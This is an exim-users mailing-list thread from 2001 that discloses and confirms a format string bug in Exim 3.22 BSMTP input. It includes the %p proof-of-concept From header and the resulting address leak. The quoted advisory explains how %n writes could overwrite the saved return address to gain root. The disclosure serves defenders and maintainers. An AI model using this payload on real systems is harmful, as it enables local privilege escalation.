Confirmed on RedHat 7.0, Exim 3.22...
[root@alcazar /root]# exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p
.
550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x817da500x8178240(nil)(nil)(nil)(nil)0x817d83c0x817d810(nil)(nil)
Transaction started in line 0
Error detected in line 5
An error was detected while processing a file of BSMTP input.
The error message was:
550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x817da500x8178240(nil)(nil)(nil)(nil)0x817d83c0x817d810(nil)(nil)
The SMTP transaction started in line 0.
The error was detected in line 5.
0 previous messages were successfully processed.
The rest of the batch was abandoned.
On Thu, 7 Jun 2001, Tabor J. Wells wrote:
> I'm unable to get my 3.22 systems on Solaris 2.6 x86 and 8 on Sparc to
> exhibit this behavior, with the options Megyer stated were necessary. I
> wonder if it's OS specific.
>
> Megyer,
>
> Perhaps you could provide a bit more detail. Which version of Exim? Which
> OS and version? Also you could have approached the author (Philip Hazel)
> or the exim-users list in general before going public.
>
> Thanks,
>
> Tabor
>
> On Wed, Jun 06, 2001 at 04:12:16PM +0200,
> Tamas TEVESZ <ice@???> is thought to have said:
>
> > Exploitation:
> > -------------
> >
> > Try this:
> > ===8<======8<=======8<======
> > lez:~$ /usr/sbin/exim -bS
> > mail from:lez@lez
> > rcpt to:hax0r@lez
> > data
> > From:@@%p%p%p%p%p%p%p%p%p%p
> >
> > .
> > ===8<======8<=======8<=======
> >
> > Somewhere in the answers you should see:
> > 550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40
> >
> > If you change %p's to %s's, you get segfault. With carefully constructed thing, it's easy to overwrite saved eip with %n's, and get root out of this bug.
> >
> > No exploit yet, but after the many local format bug exploits it's not a big work to write one for a skilled man.
> > --
> > Megyer Laszlo (Lez)
> > lez@???
> > __________________________________________________
> > Security-l maillist - Security-l@???
> > http://sunserv.kfki.hu/mailman/listinfo/security-l
> >
> >
> >
> >
> >
> > --
> > ## List details at http://www.exim.org/mailman/listinfo/exim-users Exim details at http://www.exim.org/ ##
>
>
--
Regards,
Chris Knipe
Vardus (PTY) Ltd.
Technical Administrator
